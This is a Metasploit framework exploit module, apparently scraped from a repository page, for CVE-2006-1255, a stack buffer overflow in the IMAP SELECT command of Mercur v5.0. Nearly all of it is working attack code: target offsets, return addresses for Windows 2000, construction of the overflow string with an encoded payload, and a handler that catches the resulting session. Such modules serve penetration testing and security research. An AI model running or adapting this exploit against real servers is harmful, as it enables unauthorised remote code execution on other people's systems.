Path: blob/master/modules/exploits/windows/imap/mercur_imap_select_overflow.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Imap910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Mercur v5.0 IMAP SP3 SELECT Buffer Overflow',15'Description' => %q{16Mercur v5.0 IMAP server is prone to a remotely exploitable17stack-based buffer overflow vulnerability. This issue is due18to a failure of the application to properly bounds check19user-supplied data prior to copying it to a fixed size memory buffer.20Credit to Tim Taylor for discover the vulnerability.21},22'Author' => [ 'Jacopo Cervini <acaro[at]jervus.it>' ],23'License' => BSD_LICENSE,24'References' => [25[ 'CVE', '2006-1255' ],26[ 'OSVDB', '23950' ],27[ 'BID', '17138' ],28],29'Privileged' => true,30'DefaultOptions' => {31'EXITFUNC' => 'process',32},33'Payload' => {34'Space' => 400,35'BadChars' => "\x00",36'StackAdjustment' => -3500,3738},39'Platform' => 'win',40'Targets' => [41['Windows 2000 Server SP4 English', { 'Offset' => 126, 'Ret' => 0x13e50b42 }],42['Windows 2000 Pro SP1 English', { 'Offset' => 127, 'Ret' => 0x1446e242 }],43],44'DefaultTarget' => 0,45'DisclosureDate' => '2006-03-17',46'Notes' => {47'Reliability' => UNKNOWN_RELIABILITY,48'Stability' => UNKNOWN_STABILITY,49'SideEffects' => UNKNOWN_SIDE_EFFECTS50}51)52)53end5455def exploit56sploit = "a001 select " + "\x43\x49\x41\x4f\x20\x42\x41\x43\x43\x4f\x20"57sploit << rand_text_alpha_upper(94) + rand_text_alpha_upper(target['Offset'])58sploit << [target.ret].pack('V') + "\r\n" + rand_text_alpha_upper(8)59sploit << payload.encoded + rand_text_alpha_upper(453)6061info = connect_login6263if (info == true)64print_status("Trying target #{target.name} using heap address at 0x%.8x..." % target.ret)65sock.put(sploit + "\r\n")66else67print_status("Not falling through with exploit")68end6970handler71disconnect72end73end747576